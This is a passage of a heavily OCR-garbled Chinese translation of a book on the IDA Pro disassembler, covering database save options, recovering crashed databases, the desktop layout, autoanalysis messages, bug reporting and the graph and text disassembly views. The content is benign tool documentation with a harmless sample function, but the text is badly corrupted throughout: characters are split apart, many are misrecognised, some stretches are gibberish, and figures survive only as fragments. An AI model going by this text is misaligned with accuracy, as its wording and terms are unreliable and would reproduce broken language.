如 果 这 是 你 初次 保存 一 个 新 建 的 数据 库 ，IDA 会 用 扩展 名 .idb 替换 输入 文件 的 扩展 名 ， 从 而 
生成 新 数据 库 的 文件 名 ， 例 如 ，example.exe 会 生成 名 为 example.idb 的 数据 库 。 如 条 输 入 文件 没 
有 扩展 名 ，IDA 会 将 .idb 附加 到 输入 文件 名 称 后 面 ,， 构 成 数据 库 名 称 ， 如 httpd 生成 httpd.idb。 下 
面 简 要 说 明 可 用 的 保存 选项 及 其 音义。 
口 Don't pack database 〈 不 打包 数据 库 )。 这 个 选项 仅仅 刷新 对 4 个 数据 库 组 件 文件 所 做 的 
更 改 ， 在 关闭 果 面 前 并 不 创建 IDB 文件 。 在 关闭 数据 库 时 ， 不 建议 使 用 这 个 选项 。 

Q Pack database (Store) [打包 数据 库 ( 存 储 )]。 选 择 Store 选项 会 将 4 个 数据 库 组 件 文 
件 存 到 一 个 IDB 文件 中 。 之 前 的 任何 IDB 不 经 确认 即 被 覆盖 。Store 选项 不 使 用 压缩 。 创 
建 IPB 文件 后 ，4 个 数据 库 组件 文 件 即 被 删除 。 











(D 第 6 章 将 详细 介绍 栈 帧 。 
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Q Pack database (Deflate) [打包 数据 库 〈 压 缩 )]。Deflate 选项 等 同 于 Store 选项 ， 其 唯 
-的 差别 在 于 数据 库 组 件 文 件 被 压缩 到 IDB 归档 文件 中 。 

O Collect garbage (收集 垃圾 )。 如 果 请 求 二 圾 收集 ，IDA 会 在 关闭 数据 库 之 前 ， 从 数据 库 
中 删除 任何 没有 用 的 内 存 页 面 。 在 选择 这 个 选项 的 同时 ， 选 择 Deflate 选项 可 创建 尽 可 能 
小 的 IPB 文件 。 通 党 ， 只 有 在 磁盘 空间 不 足 时 才 选 择 这 个 选项 。 

Q DON'T SAVE the datebase 〈 不 保存 数据 库 )。 你 可 能 会 感到 奇怪 ， 怎 么 会 有 人 不 保存 目 
己 的 工作 呢 ! 要 知道 ， 要 想 放弃 你 当前 对 数据 库 所 做 的 更 改 ( 上 次 保存 之 后 )， 使 用 这 个 
选项 是 唯一 的 办 法 。 选 择 这 个 选项 时 ,IDA 会 删除 4 个 数据 库 组 件 文件 , 保留 现 有 的 未 经 
修改 的 IDB 文件 。 使 用 这 个 选项 类 似 于 在 使 用 IDA 时 应 用 了 撤销 或 还 原 功能 。 


4.2.8 ”重新 打开 数据 库 


FKE, 重新 打开 一 个 现 有 的 数据 库 根 本 与 “火箭 科学 ”( 指 很 难 做 、 很 难 懂 的 事情 ) 无 关 ”。 
因此 ,你 可 能 会 问 ,为 什么 还 要 讨论 这 个 主题 呢 ” 正 常情 况 下 ， 要 想 重 新 打开 现 有 数据 库 ， 只 需 
使 用 IDA 的 文件 打开 方法 来 选择 数据 库 。 通 常 ， 由 于 IDA 不 需要 分 析 ， 在 第 二 次 ( 及 随后 ) F 
开 数 据 库 文件 时 ， 它 的 运行 速度 会 更 快 。 而 且 ，IDA 会 将 桌面 恢复 到 它 上 次 关闭 时 的 状态 。 

问题 是 : IDA 会 不 时 月 沉 ， 信 不 信 由 你 。 导 致 朋 沉 的 原因 ， 要么 是 "Dat DD bug, 或 者 是 
你 所 安装 的 某 个 “风险 ”插件 中 有 bug， 骨 尝 可 能 会 令 打 开 的 数据 库 遭 到 破坏 。 一 旦 你 重启 IDA 
于 尝试 再 次 打开 受 影 响 的 数据 库 ，IDA 可 能 会 显示 如 图 4-7 和 图 4-8 所 示 的 对 话 框 。 


IDA has found unpacked version of database C:\IdaBook}\SecondEdition\example.idb 
on the disk. Please choose: 























zemmer) cmn | 





图 4-7 恢复 数据 库 的 对 话 框 


Database for file 'C:\IdaBook\SecondEdtion\example.id0' isn't dosed. Do you want IDA 
to repair it? 


Plcasc note that thc repaired databasc may still have problems. 
The best solution is to use the packed database or a backup. 


Is lp | ee | rep | 





图 4-8 ”修复 数据 库 的 对 话 框 


IDA jii, IDA 并 没有 机 会 关闭 处 于 活动 状态 的 数据 库 ， 也 无 法 删除 中 间 文 件 。 如 果 你 并 
不 是 第 一 次 处 理 某 个 数据 库 ， 这 可 能 会 导致 IDB 文件 和 可 能 唱 到 破坏 的 中 间 文 件 并 存 。IDB 文件 
是 你 上 次 保存 的 、 状 态 民 好 的 数据 库 文 件 ， 而 中 间 文 件 则 包含 上 次 保存 后 你 做 的 任何 更 改 。 在 这 


D 除非 你 打开 的 恰巧 是 rocket_science.idb。 
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种 情况 下 ,可 以 选择 还 原 上 次 保存 的 版 本 ， 或 依旧 使 用 已 打开 的 、 可 能 遭 到 破坏 的 版 本 ， 如 图 4-7 
所 示 。 选 择 Continue with Unpacked base ( 继续 使 用 未 打包 的 库 ) 并 不 能 保证 可 以 恢复 你 所 做 的 全 
部 更 改 。 未 打包 的 数据 库 可 能 已 遭 到 破坏 , 这 会 促使 IDA 显示 如 图 4-8 所 示 的 对 话 框 。 这 时 ，IDA 
会 建议 你 还 原 已 打包 的 数据 。 如 果 你 选择 使 用 已 修复 的 数据 库 ， 请 考虑 清楚 其 可 能 导致 的 后 果 。 

另外 ， 如 末 一 个 处 于 活动 状态 的 数据 库 从 未 被 保存 过 ，IDA 前 省 时 系统 中 仅 存 在 中 间 文 件 ， 
这 时 也 会 显示 如 图 4-8 所 示 的 对 话 框 。 在 这 种 情况 下 ， 当 你 再 次 打开 原始 的 可 执行 文件 时 ，IDA 
将 提供 修复 选项 。 


4.3 IDA 桌面 简介 


你 将 大 量 用 到 IDA, 桌面 ,应 该 花 时 间 熟 悉 一 下 它 的 各 种 组 件 。IDA 的 默认 更 面 如 图 4-9 所 示 。 
我 们 将 在 下 一 节 讨 论 时 面 在 分 析 文 件 时 的 各 种 行为 。 

我 们 将 介绍 以 下 区 域 。 

(1) 工具 栏 区 域 ( @ ) 包含 与 IDA 的 常用 操作 对 应 的 工具 。 你 可 以 使 用 View » Toolbars 命令 
显示 或 隐藏 工具 栏 。 你 可 以 使 用 鼠标 拖 放 工具 栏 ， 根 据 需 要 重新 设 定 它 们 的 位 置 。 珊 有 单独 一 排 
工具 按钮 的 IDA 的 基本 模式 工具 栏 如 网 4-9 所 示 。 用 户 可 以 使 用 View » Toolbars » Advanced mode 
打开 高 级 模式 工具 栏 。 高 级 模式 工具 位 包含 整整 三 排 工 具 按 钮 。 


A TDA - (:MdaBookVSecondFditionVXch4. example.exe 





























lo | lS Fric: E 习 
L- 
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8 x| 国 mAvewA 回 | (O Hexvewa El | [A] Stuctures E] | [£] enms (3 | S mots A | 2 Geo 日 | € 








[f| sub. 401000 
suh, 41030 


; Attributes: bp-based frame 


; int cdecl main(int argc, const char ** 
main proc near 


var 10— dword ptr 10h o 




















e F5: decompile, Ctrl-F5- decompile all. 
u for more info ton 
ot all privileges or 


rma a 
groups referenced are assigned to the caller 
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O) 彩 色 的 水 平 带 是 IDA 的 概况 导航 栏 ( @ )， 也 叫做 导航 带 。 导 航 带 是 被 加 载 文件 地 址 空间 
的 线性 视图 。 默认 情况 下 , 它 会 呈现 二 进 制 文件 的 整个 地 址 范围 。 你 可 以 右 击 导 航 带 内 任何 位 置 ， 





43 IDA Xj fsjr 43 


并 选择 一 个 可 用 的 缩放 选项 , 放大 或 缩小 显示 的 地 址 范围 .不 同 的 颜色 表示 不 同类 型 的 文件 内 容 ， 
如 数据 或 代码 。 同 时 ， 在 导航 市 上 ， 会 有 一 个 细小 的 当前 位 置 指示 符 〈 轩 认为 呐 色 ) 指 回 与 当前 
反 汇 编 窗 口中 显示 的 地 址 范围 对 应 的 导航 这 地 址 。 将 光标 悬 俘 在 导航 审 的 任何 位 置 , IDA 会 显示 
一 个 工具 提示 ,指出 其 在 二 进 制 文件 中 的 对 应 位 置 。 单 击 导 航 融 ， 反 汇编 视图 将 跳 转 到 二 进 制 文 
件 中 你 选 定 的 位 置 。 用 户 可 以 通过 Options » Colors 命令 日 定义 导航 带 所 使 用 的 颜色 。 拖 动 导航 
带 ， 使 其 离开 IDA 果 面 ， 你 将 得 到 一 个 分 离 的 概况 导航 栏 ， 如 图 4-10 所 示 。 在 图 4-10 中 ， 你 可 
以 看 到 当前 位 置 指示 符 〈 上 左边 的 半 长 回 下 箭头 ) 和 按 功 能 组 标识 文件 内 容 的 颜色 键 。 




















Navigator Scale: 1 pixel = 128 bytes; Range: 00401000-0040EC80 Library function Data 
| M | | | Il | D: lll Regular function Bl Unexplored 
> 1 E instruction E External symbol 
Additional display: | -] 


图 4-10 WA enk: 


(3) 回 到 图 4-9, IDA 为 当前 打开 的 每 一 个 数据 显示 窗口 都 提供 了 标签 ( 卓 )。 数 据 显 示 窗 口中 
包含 从 二 进 制 文件 中 提取 的 信息 ， 它 们 代表 数据 库 的 各 种 视图 。 绝 大 多 数 分析 工 作 需 要 通过 数据 
显示 窗口 完成 。 图 4-9 显示 了 3 个 数据 显示 窗口 : IDA-View, Functions 和 Graph Overview。 通 过 
View » Open Subviews 菜单 可 打开 其 他 数据 显示 窗口 ， 还 可 恢复 任何 意外 关闭 或 有 意 关 闭 的 窗口 。 

(4) 反 汇 编 视 图 (@ ) 是 主要 数据 显示 视图 ， 它 有 两 种 不 同 的 形式 : 图 形 视 图 ( 默认 ) 和 列 
表 视 图 。 在 图 形 视图 中 ,IDA 显示 的 是 某 个 水 数 在 某 一 时 间 的 流程 图 。 结 合 使 用 图 形 概况 ,你 就 
可 以 通过 该 也 数 结构 的 视觉 分 解 图 来 了 解 子 数 的 运行 情况 。 打 开 IDA-View 窗口 后 ， 可 以 使 用 空 
格 键 在 图 形 视图 样式 和 列表 视图 样式 之 间 切 换 。 如 果 和 希望 将 列表 视图 作为 默认 视图 ， 则 必须 通过 
Options * General 菜单 打开 IDA Options 复 选 框 ， 取 消 选 择 Graph 选项 卡 下 的 Use graph view by 
default ( 默认 使 用 图 形 视图 ) 复 选 框 ， 如 图 4-11 ro. 


Disassembly | Analysis | CrossTeferences | Strings | Browser Graph | Misc | 





























I Use graph view by default 
[v Enable graph animation 
[v Draw node shadows 

[ Auto fit graph into window 


[v Fit window max zoom level 100% 

[v Redayout graph if nodes overlap 

[v Redayout graph upon screen refresh 

[ Truncate at the right margin 

[ Lock graph layout 

Maximum number of nodes [i000 — 





图 4-11 IDA 图 形 选 项 





44 [|] 40 IDA[I [] 


(5) fEFHADE BLÉSTHSE, Warm X ond PAAR ESEAUE. im, DDDU 视图 
(@， 仪 在 使 用 图 形 视图 时 显示 ) 可 提供 基本 图 形 结构 的 缩小 快照 ， 其 中 的 虚线 矩形 表示 其 在 图 
形 视图 中 的 当前 显示 位 置 。 在 图 形 概况 窗口 内 单 击 鼠 标 ， 可 重新 定位 图 形 视图 的 显示 位 置 。 

(6) 输出 窗口 ( @ ) 显示 的 是 IDA 输出 的 信息 。 在 这 里 ， 用 户 可 以 找到 与 文件 分 析 进 度 有 关 
的 状态 消息 ， 以 及 由 用 户 操作 导致 的 错误 消息 。 输 出 窗口 基本 上 等 同 于 一 个 控制 合 输出 设备 。 

(7) PAAU (O) 是 默认 IDA 显示 窗口 的 最 后 一 部 分 ,我 们 将 在 第 5 章 详细 讨论 这 些 窗 口 。 


4.4 ”初始 分 析 时 的 果 面 行为 


在 对 一 个 新 打开 的 文件 进行 初始 目 动 分 析 的 过 程 中 , 蝎 面 上 会 发 生 大 量 活动 。 通 过 观察 分 析 
过 程 中 的 各 种 果 面 显示 ， 用 户 可 初步 了 解 分 析 情 况 。 你 所 观察 到 的 时 面 活 动 包 括 以 下 内 容 。 

口 消息 输出 窗口 显示 的 进度 消息 。 

口 反 汇 编 窗 口 显 示 的 初始 位 置 和 反 汇 编 输出 。 

O Functions 窗口 中 显示 的 初始 值 ， 以 及 在 分 析 过 程 中 的 定期 更 新 。 

a 当 二 进 制 文件 中 的 新 区 域 被 识别 为 代码 和 数据 ， 代 码 块 被 进一步 识别 为 函数 ， 以 及 最 后 

使 用 IDA 的 模式 匹配 技术 将 函数 识别 为 代码 块 时 ， 导 航 带 的 变化 情况 。 

a 当前 位 置 指示 符 在 导航 市 上 移动 ， 指 明 当 前 正在 分 析 的 区 域 。 

下 面 的 输出 是 在 对 一 个 新 打开 的 二 进 制 文件 进行 初始 分 析 时 DA 生成 的 典型 消息 。 什 得 注 
意 的 是 ， 这 些 消息 记述 了 分 析 过 程 ， 并 为 我 们 了 解 IDA 在 分 析 过 程 中 所 执行 的 操作 序列 提供 了 
帮助 。 
























































Loading file 'C:\IdaBook\ch4 example.exe' into database... 
Detected file format: Portable executable for 80386 (PE) 


0. Creating a new segment  (00401000-0040CO00) ... ... OK 

1. Creating a new segment  (0040C000-0040E000) ... ... OK 

2. Creating a new segment  (0040E000-00411000) ... ... OK 
Reading imports directory... 

3. Creating a new segment  (0040C120-0040EO000) ... ... OK 


Plan FLIRT signature: Microsoft VisualC 2-10/net runtime 
autoload.cfg: vc32rtf.sig autoloads mssdk.til 
Assuming _ cdecl calling convention by default 
main() function at 401070, named " main" 
Marking typical code sequences... 
Flushing buffers, please wait...ok 
File 'C:MIdaBookNch4 example.exe' is successfully loaded into the database. 
Compiling file ‘C:\Program FilesMIdaProMidcMida.idc'... 
Executing function 'main'... 
Compiling file ‘C:\Program FilesMIdaProMVidcNonload.idc'... 
Executing function 'OnLoad'... 
IDA is analysing the input file... 

€) You may start to explore the input file right now. 


Python 2.6.5 (r265:79096, Mar 19 2010, 21:48:26) [MSC v.1500 32 bit (Intel)] 
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IDAPython v1.4.2 final (serial oi (c) The IDAPython Team 
«idapython8googlegroups.com» 
Using FLIRT signature: Microsoft VisualC 2-10/net runtime 
Propagating type information... 
Function argument information has been propagated 

O The initial autoanalysis has been finished. 





HB, You may start to explore the input file right now ( @， 现 在 可 以 开始 人 研究 输入 文 
件 了 ) 和 The initial autoanalysis has been finished ( 四， 初始 分 析 已 完成 ) 是 两 条 特别 有 用 
的 进程 消息 。 第 一 条 消息 通知 用 户 ，IDA 的 分 析 已 取得 巨大 进展 ， 可 以 开始 浏览 各 种 数据 显示 窗 
口 。 但 是 ,浏览 并 不 意味 着 更 改 ， 你 应 该 等 到 分 析 彻 底 完 成 ， 再 对 数据 库 进 行 修改 。 如 采 你 尝试 
在 分 析 完 成 之 前 更 改 数据 库 , 分 析 引 擎 随后 可 能 会 修改 你 所 做 的 更 改 , 或 者 你 的 做 法 会 导致 分 析 
引擎 无 法 正常 工作 。 第 二 条 消息 的 意思 相当 明显 ， 它 表示 自 此 以 后 ， 喝 面 数据 显示 窗口 的 内 容 将 
不 再 自动 更 改 。 这 时 ， 你 可 以 对 数据 库 进 行 任意 修改 。 
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IDA BERKERS, RAER eLo kën, BWITGAT TUM IB Du CIE. 

口 对 IDA ifi zi, DUSEL. "it WKE (AAA ep zelt 

Q 使 用 View » Open Subviews 命令 恢复 你 无 意 中 关 闭 的 数据 显示 窗口 。 

Q 使 用 Windows >» Reset Desktop 命令 可 迅速 将 蝎 面 恢复 到 原始 布局 。 

口 利用 Windows » Save Desktop 命令 保存 你 认为 特别 有 用 的 当前 昌 面 布局 。 使 用 Windows ， 
Load Desktop 命令 迅速 打开 你 之 前 保存 的 一 个 桌面 布局 。 

口 Disassembly 窗口 (无论 是 图 形 视图 或 列表 视图 ) 是 唯一 一 个 你 可 以 修改 其 显示 字体 的 窗 
O- EH Options » Font 命令 可 以 设置 字体 。 



































4.6 报告 bug 


与 其 他 软件 一 样 ，IDA 有 时 也 包含 bug。 那 么 ， 如 末 你 认为 你 在 IDA 中 发 现 一 个 bug， 你 期 
f$ Hex-Rays 如 何 反应 呢 ? 首先 ，Hex-Rays 拥有 一 个 反应 极其 迅速 的 文 持 系 统 ; 其 次 ， 如 有 果 在 提 
交 支 持 请 求 的 一 天 之 内 ， 你 得 到 Itfak 的 亲自 回复 ， 请 不 要 感到 惊奇 。 

可 以 通过 两 种 方法 提交 报告 : 通过 电子 邮件 地 址 support@hex-rays.com 联系 Hex-Rays 文 持 
部 门 ; 如 果 不 想 使 用 电子 邮件 ,还 可 以 在 Hex-Rays 公告 牌 上 的 Bug Reports 讨论 中 发 布 信息 。 无 




















库 文件 。 前 面 提 到 ，Hex-Rays 提供 的 SDK 支持 需要 额外 收费 。 对 于 与 你 安装 的 插件 有 关 的 bug， 
可 能 需要 联系 插件 的 创建 者 。 至 于 你 正在 开发 的 插件 中 存在 的 bug, 需要 充分 利用 IDA 用 户 支持 
论坛 ， 并 等 待 同行 的 积极 响应 。 
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4.7 小结 


熟悉 IDA 工作 区 可 显著 提高 你 使 用 IDA 的 熟练 程度 。 如 果 不 能 充分 利用 手中 的 工具 ， 对 二 
进 制 代码 进行 逆 癌 工程 将 会 困难 重重 。 你 在 初始 加 载 阶段 和 DA 随后 执行 的 自动 分 析 过 程 中 选 
择 的 选项 ， 将 为 你 接 下 来 的 分 析 工 作 做 好 准备 。 初 步 分 析 完 成 后 ， 你 可 能 已 经 满足 于 IDA Sei: 
完成 的 任务 。 对 于 简单 的 二 进 制 文件 而 言 ， 自 动 分 析 就 已 经 足够 了 了。 另外 ,如果 你 想 知道 如 何 与 
IDA 交互 ， 可 以 更 深入 地 研究 IDA 各 种 数据 显示 窗口 的 功能 。 接 下 来 的 几 章 将 介绍 IDA 的 主要 
数据 显示 窗口 中 的 每 一 个 及 其 适用 场合 ， 以 及 如 何 利用 这 些 窗口 来 扩充 和 更 新 数据 库 。 























IDA 数 据 显示 窗口 





SUN 你 已 经 能 够 自信 地 将 二 进 制 文 件 加 载 到 IDA 中 ， 一 边 喝 着 自己 喜欢 的 饮料 ， 一 边 
让 IDA 发 挥 它 的 “魔力 ”。IDA 和 完成 初始 分 析 后 , 该 是 你 接管 控制 权 的 时 候 了 。 AIDA 
显示 的 最 佳 方法 是 ,浏览 IDA 用 于 显示 二 进 制 数据 的 各 种 市 标签 的 子 窗口 。 对 IDA 越 熟悉 ， 执 行 
逆 癌 工程 任务 的 效率 也 越 蜗 。 
在 详细 介绍 IDA 的 主要 子 和 窗口 之 前 ， 前 完了 解 IDA 用 户 界 面 的 如 下 基本 规则 会 有 所 帮助 。 
a IDA 不 提供 撤销 功能 。 如 果 由 于 你 不 小 心 按 下 菏 个 键 ， 导致 数据 库 文件 发 生意 外 ， 这 时 ， 
你 必须 自己 将 显示 窗口 恢复 到 以 前 的 状态 。 
口 几乎 所 有 的 操作 都 有 其 对 应 的 菜单 项 、 热 键 和 工具 栏 按钮 。 记 住 ,，IDA 的 工具 栏 蜗 度 可 配 
置 ， 台 像 热 键 对 沫 单 操 作 的 映射 一 样 。 
O IDA 提 供 方便 的 、 基 于 上 下 文 的 鼠标 右键 操作 菜单 。 虽 然 这 些 某 单 无 法 提供 在 东 个 位 置 允 
许 执行 的 操作 的 详尽 列表 ， 但 你 可 以 用 它们 执行 一 些 最 帝 见 的 操作 。 
了 解 这 些 规 则 之 后 ， 下 面 开 始 介绍 IDA 主 要 的 数据 显示 窗口 。 


5.1 IDA 主要 的 数据 显示 窗口 


在 默认 配置 下 ，IDA (从 6.1 版 开始 ) 会 在 对 新 二 进 制 文件 的 初始 加 载 和 分 析 阶 段 创建 7 个 显 
示 窗 口 。 这 些 窗 口 全 部 可 以 通过 导航 带 下 方 显示 的 一 组 标题 标签 访问 〈 如 图 4-9 所 示 )。3 个 立即 
可 见 的 窗口 分 别 为 IDA-View 和 窗口、 函数 窗口 和 消息 输出 窗口 。 无 论 这 些 和 窗口 是否 默认 打开 ,我 
们 在 本 章 讨 论 的 所 有 窗口 都 可 通过 View》 Open Subviews 菜 单打 开 。 请 记 住 这 一 点 ， 因 为 你 可 能 
会 经 常 无 意 中 关 闭 IDA 的 显示 窗口 。 

在 IDA 中 ，ESC 键 是 一 个 非常 有 用 的 热 键 。 在 反 汇 编 窗 口中 ，ESC 键 的 作用 与 Web 浏 览 磊 的 
“后 退 ” 按 钮 类 似 ， 因 此 ， 它 在 导航 反 汇 编 窗 口 时 非常 有 用 (导航 将 在 第 6 章 详 细 介 绍 )。 遗 憾 的 
是 ,在 打开 的 其 他 窗口 中 ，ESC 键 用 于 关闭 窗口 。 有 时 候 ， 你 可 能 恰恰 想 要 关闭 窗口 ， 但 其 他 情 
况 下 ， 你 可 能 希望 立即 重新 打开 刚刚 关闭 的 窗口 。 


5.1.1 反 汇 编 窗 口 


肥 汇 编 和 窗口 也 叫 IDA-View 和 窗口 ， 它 是 操作 和 分 析 二 进 制 文件 的 主要 工具 。 因 此 ， HIT 
编 窗口 中 信息 的 显示 方式 ， 对 于 我 们 非常 重要 。 
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反 汇 编 窗 口 有 两 种 显示 格式 : 默认 的 基于 图 形 的 视图 和 面 回 文本 的 列表 视图 。 多 数 IDA 用 户 
会 有 所 偏好 ,具体 使 用 哪 一 种 视图 ， 取决 于 用 户 如 何 使 程序 的 流程 可 视 化 。 如 果 你 想 将 文本 列表 
视图 作为 默认 汇编 视图 ， 可 以 用 Options ”General 某 单 命 令 打开 IDA Options 复 选 框 ， 取 消 选 择 
Graph 选项 卡 下 的 Use graph view by default ( 默认 使 用 图 形 视图 ) 选项 。 在 打开 的 反 汇 编 窗 口中 ， 
你 可 以 使 用 空格 键 在 图 形 视图 与 列表 视图 之 间 切 换 。 

1. IDA 图 形 视图 

图 5-1 显 示 了 图 形 视图 中 一 个 非常 简单 的 子 数 。 图 形 视图 会 让 人 联想 到 程序 流程 图 ， 因 为 它 
将 一 个 函数 分 解 成 许多 基本 块 "， 以 生动 显示 该 函数 由 一 个 块 到 男 一 个 块 的 控制 流程 。 


IDA View-A EI 




















; Attributes: bp-based frame 
sub 4011B5 proc near 

arg 0= dword ptr 8 

arg 4— dword ptr OCh 


arg 8— dword ptr 10h 


ebp 
ebp, esp 


ecx, [ebptarg 8] 
edx, [ebp*arg 4] 
eax, [ebp+arg 0] 
ecx, ecx 

short loc 4011D1 





loc 4011C5: 
test edx, edx 
jz short loc 4011CC 








sub 4011B5 endp 





100.008 
, 


(-38,-8) |(273,0) |0O00000B5 [004011B5- sub 4011B5 








图 $-1 IDA 图 形 视 图 


在 屏幕 上 你 会 发 现 ，IDA 使 用 不 同 的 彩色 箭头 区 分 函数 块 之 间 各 种 类 型 的 流 ”。 根 据 测 试 条 
件 ， 在 条 件 跳 转 位 置 终止 的 基本 块 可 能 会 生成 两 种 流 : Yes 边 的 箭头 〈 是 的 ， 执 行 分 文 ) 默认 为 





CD 基本 块 是 一 个 不 包含 分 支 ， 从 头 执行 到 尾 的 最 大 指令 序列 。 因 此 ， 每 个 基本 块 都 有 唯一 的 入 口 点 ( 块 中 的 第 一 条 
指令 ) 和 人 退出 点 ( 块 中 的 最 后 一 条 指令 )。 基 本 块 中 的 第 一 条 指令 通常 是 分 支 指令 的 目标 ， 而 最 后 一 条 指令 则 往 
往 是 一 条 分 支 指令 。 

© IDA 使 用 术语 流 来 表示 某 个 指令 如 何 继续 执行 。 正 常 流 ( 也 叫做 普通 流 ) 表示 指令 默认 连续 执行 。 跳 转 流 表示 当 
前 的 指令 跳 转 到 ( 或 可 能 跳 转 到 ) 某 个 非 连 续 性 位 置 。 调 用 流 表 示 当 前 指令 会 调用 一 个 子 例 程 。 
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绿色 ，No 边 的 箭头 〈 不 ， 不 执行 分 文 ) 默认 为 红色 。 只 有 一 个 后 继 块 的 基本 块 会 利用 一 个 正 篆 
边 ( 默认 为 蓝 色 ) 指向 下 一 个 即将 执行 的 块 。 

在 图 形 模式 下 , IDA 一 次 显示 一 个 函数 。 使 用 滑轮 鼠标 的 用 户 , 可 以 使 用 “CTRL+ 鼠 标 滑轮 ” 
来 调整 图 形 的 大 小 。 键 盘 缩放 控制 需要 使 用 “CTRL+ 加 号 键 ” 来 放大 ， 或 使 用 “CTRLT+ 减 号 键 ” 
来 缩 小 。 大 型 或 复杂 的 冰 数 可 能 会 导致 图 形 视图 变 得 极其 杂乱 ， 使 得 用 户 难于 导航 。 在 这 种 情况 
下 ,使 用 “图 形 概况 ”窗口 ( 见 图 5-2 ) 会 有 所 帮助 。 概 况 窗 口 会 娘 终 显示 图 形 完 整 的 块 状 结构 ， 
并 用 一 个 虚线 框 指出 你 当前 在 反 汇 编 窗口 中 查看 的 图 形 区 域 . 用 户 可 以 用 鼠标 在 概况 窗口 中 拖 动 
该 虚线 框 ， 以 迅速 将 图 形 视 图 调整 到 任何 想到 的 位 置 。 





























图 5-2 “图 形 概 况 ” 衔 口 





用 户 可 以 通过 几 种 方式 控制 图 形 视图 的 显示 方式 ， 使 其 满足 你 的 要 求 。 

O $. Hie, 除了 使 用 “图 形 概况 ”窗口 迅速 定位 图 形 外 ， 你 还 可 以 通过 单 击 和 拖 动 图 
形 视图 的 背景 来 定位 图 形 。 

口 重新 调整 块 位 置 。 通 过 单 击 指 定 块 的 标题 栏 并 将 其 拖 动 到 一 个 新 位 置 ， 用 户 可 以 移动 图 
形 中 的 每 一 个 块 的 位 置 。 需要 注意 的 是 , IDA 会 尽 可 能 少 地 重新 设 定 一 个 被 移动 的 块 的 连 
接线 "的 位 置 。 你 可 以 拖 动 连接 线 的 项 点 ， 手 动 更 改 连 接线 的 路 径 。 在 按 下 SHIFT 刍 的 同 
时 ， 在 连接 线 的 任何 位 置 双击 鼠标 ， 即 可 在 该 位 置 添 加 一 个 新 顶点 。 如 果 希 望 还 原 默认 
的 图 形 布 局 ， 可 以 右 击 图 形 ， 并 在 出 现 的 亲 单 中 选择 Layout Graph. 

OQ 分 组 和 折 又 块 。 最 后 ， 你 可 以 对 块 分 组 ， 每 个 块 单独 分 组 ， 或 者 与 其 他 块 一 起 分 组 ; 并 可 
将 分 组 后 的 块 折 硅 起 来 ， 以 减少 显示 的 混乱 程度 。 折 春 块 特别 有 用 ， 可 以 帮助 你 追踪 已 经 
分 析 过 的 块 。 BER, 可 以 右 击 块 的 标题 栏 , 然后 在 出 现 的 菜单 上 选择 “Group Nodes"; 

口 创建 其 他 反 汇 编 窗 口 。 如 果 你 想 要 同时 查看 两 个 不 同 水 数 的 图 形 ,可 以 通过 Views》 Open 
Subviews » Disassembly 命 令 打 开 男 一 个 反 汇 编 窗 口 。 这 样 打 开 的 第 一 个 反 汇 编 窗 口 叫 做 
IDA View-A。 随 后 的 反 汇 编 窗 口 叫 做 IDA View-B、IDA View-C， 依 次 类 推 。 每 个 反 汇 编 
窗口 都 独立 于 其 他 窗口 。 你 完全 可 以 在 一 个 窗口 中 查看 一 个 图 形 ， 在 另 一 个 窗口 中 查看 





























CD 即 连接 两 个 块 的 带 箭 头 的 折线 。 一 一 译 者 注 
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文本 列表 ， 或 者 在 3 个 不 同 的 窗口 中 碍 看 3 个 不 同 的 图 形 。 
需要 指出 的 是 ， 对 于 视图 的 控制 并 不 仅 限 于 这 些 示 例 。 我 们 将 在 第 9 章 介 绍 其 他 IDA 图 形 功 
能 ， 有 关 榨 作 IDA 图 形 视 图 的 更 多 信息 ， 请 参见 IDA 的 帮助 文档 。 
2. IDA 文 本 视图 
面向 文本 的 反 汇 编 窗 口 是 查 看 和 操作 IDA 生 成 的 反 汇 编 代码 的 传统 显示 窗口 。 文 本 显示 窗口 
会 呈现 一 个 程序 的 完整 反 汇 编 代 码 清单 〈 而 在 图 形 模式 下 一 次 只 能 显示 一 个 函数 )， 用 户 只 有 通 
过 这 个 窗口 才能 查看 一 个 二 进 制 文件 的 数据 部 分 。 图 形 显示 窗口 中 的 所 有 信息 均 以 某 种 形式 存在 
于 文本 显示 窗口 中 。 











这 里 是 否 有 遗漏 信息 
D E O E E E OD OMC OK D HDD KD E E H THE Ee o o o e ONT ELT [B 
IDA OE O BD DO DO E e o ELO o e a E DU. E E BIO. OLD FE a a FEL E D. D CE BE DT 
EL DEBE TEL Bo He BE BL IE EB. BEBE TEL B B D: (BI DB BD. B DEI B B IB IE I B HL BE IDE I 
Options General! [] [] [] ADO 0 D] ODO D] D] D] Disassembly D DO D BEL O HE BED U U CI C] 


Er EET HDH TEE ER EET TER TET E ED BRI ER TEILE LE IBID LET EE EL EE EHE E] HDD "HIE S1] 
COU OO BI S890 HB ELI IU 


; Attributes: bp-based frame 


sub 4011B5 proc near 


arg 0— dword ptr 8 
arg 4— dword ptr DCH 
arg 8= dword ptr 10h 


ebp 
ebp, esp 
ecx, [ebptarg 8] 
edx, [ebp+arg 4] 
eax, [ebptarg 0] 
ecx, ecx 
004011C3 jz short loc 4011D1 


edx, edx 
004011C7 jz short loc 4011CC 





004011C9 dec eax 004011CC 
004011CA jmp short loc 4011CDj|004011CC loc 4011CC: 
004011CC inc 







eax 





004011CE jnz short loc 4011C5 





004011D1 

004011D1 loc 4011D1: 
004011D1 pop ebp 
004011D2 retn 

004011D2 sub 4011B5 endp 
004011D2 


图 5-3 ”局 用 “ 行 前 级 ”的 图 形 视 图 


5.1 IDA 主 要 的 数据 显示 窗口 5] 


图 $-1 和 图 $-3 所 显示 的 图 数 的 文本 视图 列表 如 图 $-4 所 示 。 窗 口中 的 反 汇 编 代 码 分 行 显示 , ME 
拟 地 址 则 默认 显示 。 通常, 虚拟 地 址 以 [区 域名 称 ]:[ 虚 拟 地 址 ] 这 种 格式 显示 , 如 .text:004011C1。 

显示 窗口 的 左边 部 分 叫做 前 头 窗 口 ( @ )， 用 于 描述 卫 数 中 的 非 线 性 流程 。 实 线 季 头 表 示 非 
条 件 跳 转 ， 虚 线 箭头 则 表示 条 件 跳 转 。 如 果 一 个 跳 转 (条件 或 非 条 件 ) 将 控制 权 转交 给 程序 中 的 
某 个 地 址 〈 以 前 的 )， 这 时 会 使 用 粗 线 〈 实 线 或 虚线 )。 出 现 这 类 首 疝 流程 ,通常 表示 程序 中 存在 
循环 。 在 图 $-4 中 ， 地 址 004011CF 至 004011C5 之 间 就 有 一 个 循环 箭头 。 

位 置 @ 的 声明 (也 出 现在 图 形 视 图 中 ) 是 IDA 对 于 函数 栈 帧 "布局 的 最 准确 估算 。IDA 会 对 也 
